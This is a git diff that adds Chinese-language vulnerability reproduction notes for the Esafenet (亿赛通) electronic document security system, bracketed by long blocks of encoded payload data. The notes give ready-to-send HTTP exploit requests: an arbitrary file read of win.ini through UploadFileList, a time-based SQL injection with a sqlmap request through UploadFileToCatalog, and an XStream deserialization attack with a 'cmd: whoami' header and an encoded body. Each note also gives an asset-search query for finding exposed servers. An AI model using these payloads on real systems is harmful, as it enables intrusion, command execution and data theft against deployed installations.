MDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706604868646-5a3eeaa1-3530-48cf-955b-586f5e31be9e.png](./img/KGL3mR9YEaSpWhzU/1706604868646-5a3eeaa1-3530-48cf-955b-586f5e31be9e-408318.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nbipys3d7t0rqvll>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞.md
new file mode 100644
index 0000000..f1412ed
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileList存在任意文件读取漏洞。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/gTPPxS2vifJaCH5h/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-186959.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/document/UploadFileList;login HTTP/1.1
+Host: 192.168.31.24:8090
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+
+command=VeiwUploadFile&filePath=c:/windows/win.ini&fileName1=111
+```
+
+![1705158772761-6334b83c-aa6c-4678-8f4e-021bb46bcad6.png](./img/gTPPxS2vifJaCH5h/1705158772761-6334b83c-aa6c-4678-8f4e-021bb46bcad6-389179.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kou7glcr9d0x2ty8>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞.md
new file mode 100644
index 0000000..aee1f84
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞.md
@@ -0,0 +1,55 @@
+# 亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileToCatalog存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/y6kVJz2P66ut0NRz/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-025518.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+ 
+id=1';WAITFOR DELAY '0:0:3'--
+```
+
+![1706846059605-f7ed0a2e-dbb7-44ef-9c48-e5b0f1a2f537.png](./img/y6kVJz2P66ut0NRz/1706846059605-f7ed0a2e-dbb7-44ef-9c48-e5b0f1a2f537-509400.png)
+
+sqlmap
+
+```plain
+POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+ 
+id=1
+```
+
+![1706846164296-703acde3-d5a8-4c72-9488-6605e2983e68.png](./img/y6kVJz2P66ut0NRz/1706846164296-703acde3-d5a8-4c72-9488-6605e2983e68-116124.png)
+
+[亿赛通电子文档安全管理系统-uploadfiletocatalog-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621695023-2321bd4d-69db-4840-bf2c-1e878213aca0.yaml)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bxi5rg5edb19fsou>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UserLoginOutService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UserLoginOutService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..ae2e1cb
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UserLoginOutService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统UserLoginOutService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统UserLoginOutService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/SycXQUY9DRCNi_Jk/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-439646.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/UserLoginOutService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIE